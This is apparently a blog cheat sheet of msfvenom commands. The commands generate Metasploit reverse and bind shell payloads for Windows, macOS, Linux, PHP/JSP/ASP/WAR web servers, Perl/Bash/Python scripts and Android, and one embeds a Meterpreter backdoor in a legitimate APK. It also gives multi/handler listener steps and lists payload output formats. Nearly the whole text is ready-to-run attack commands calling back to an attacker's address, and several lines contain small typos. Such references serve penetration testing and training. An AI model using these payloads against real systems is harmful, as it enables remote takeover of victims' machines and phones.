MsfVenom Payload Cheat Sheet

Msf-Venom | Meterpreter

MSFvenom Payload Creator (MSFPC) is a user-friendly multiple payload generator that can be used to generate Metasploit payloads based on user-selected options.

Content Replace
ip-address => Attacker ip address
port => Attacker port

Metasploit Payload Listener

  • msfdb run
  • use exploit/multi/handler
  • set payload-name
  • set ip-address
  • set port
  • Run

Windows Payloads

Windows Meterpreter Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe

Windows Reverse Shell

msfvenom -p windows/shell/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe

Windows Encoded Meterpreter Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 2 -f exe > payload-name.exe

Windows Meterpreter Reverse Shellcode

 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform 

macOS Payloads

macOS Bind Shell

msfvenom -p osx/x86/shell_bind_tcp rhost=ip-address lport=port-f macho > payload-name.macho

macOS Reverse Shell

msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f macho > payload-name.macho

macOS Reverse TCP Shellcode

msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f < platform 

Linux Payloads

Linux Meterpreter TCP Reverse Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f elf > payload-name.elf

Linux Bind TCP Shell

 msfvenom -p generic/shell_bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf

Linux Bind Meterpreter TCP Shell

 msfvenom -p linux/x86/meterpreter/bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf

Linux Meterpreter Reverse Shellcode

 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform 

Web-base Payloads

PHP Meterpreter Reverse Shell

 msfvenom -p php/meterpreter_reverse_tcp lhost=ip-address LPORT=port -f raw > payload-name.php

JSP Java Meterpreter Reverse Shell

 msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f raw > payload-name.jsp

ASP Meterpreter Reverse Shell

 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f asp > payload-nmae.asp

WAR Reverse TCP Shell

 msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f war > payload-name.war

Script-Base Payloads

Perl Unix Reverse shell

 msfvenom -p cmd/unix/reverse_perl lhost=ip-address lport=port -f raw > payload-name.pl

Bash Unix Reverse Shell

 msfvenom -p cmd/unix/reverse_bash lhost=ip-address lport=port -f raw > payload-name.sh

Python Reverse Shell

 msfvenom -p cmd/unix/reverse_python lhost=ip-address lport=port -f raw > payload-name.py

Android Payloads

Android Meterpreter reverse Payload

msfvenom –p android/meterpreter/reverse_tcp lhost=ip-address lport=port R > payload-name.apk

Android Embed Meterpreter Payload

msfvenom -x <app.apk> android/meterpreter/reverse_tcp lhost=ip-address lport=port -o payload-name.apk

MsfVenom Payload Formate

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

Framework Transform Formats [--format <value>]
==============================================

    Name
    ----
    bash
    c
    csharp
    dw
    dword
    hex
    java
    js_be
    js_le
    num
    perl
    pl
    powershell
    ps1
    py
    python
    raw
    rb
    ruby
    sh
    vbapplication
    vbscript
One-Liner Reverse Shell link

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →